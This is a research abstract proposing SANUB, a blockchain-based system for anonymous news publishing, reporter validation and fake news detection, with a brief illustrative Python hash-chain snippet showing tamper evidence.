Millions of news items are exchanged daily among people. With the appearance of the Internet, the way news is broadcast has changed and become faster, but this has caused many problems; for instance, the increased speed of broadcasting news leads to an increased speed of fake news creation. Fake news can have a huge impact on societies. Additionally, the existence of a central entity, such as a news agency, can lead to fraud in the news broadcasting process, e.g. generating fake news and publishing it for the agency's own benefit. Since blockchain technology provides a reliable decentralized network, it can be used to publish news. In addition, blockchain, with the help of decentralized applications and smart contracts, can provide a platform on which fake news can be detected through public participation. In this paper, we propose a new method for sharing and analyzing news to detect fake news using blockchain, called SANUB. SANUB provides features such as publishing news anonymously, news evaluation, reporter validation, fake news detection and proof of news ownership. The results of our analysis show that SANUB outperforms the existing methods.
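The tamper evidence such a design builds on can be illustrated with a toy hash chain (the record fields here are assumptions, not SANUB's actual schema):

    import hashlib, json, time

    chain = []

    def publish(news: str) -> dict:
        prev = chain[-1]["hash"] if chain else "0" * 64
        record = {"news": news, "ts": time.time(), "prev": prev}
        record["hash"] = hashlib.sha256(
            json.dumps(record, sort_keys=True).encode()).hexdigest()
        chain.append(record)
        return record

    def verify() -> bool:  # editing earlier news breaks every later link
        return all(chain[i]["prev"] == chain[i - 1]["hash"]
                   for i in range(1, len(chain)))

    publish("headline A"); publish("headline B")
    print(verify())  # True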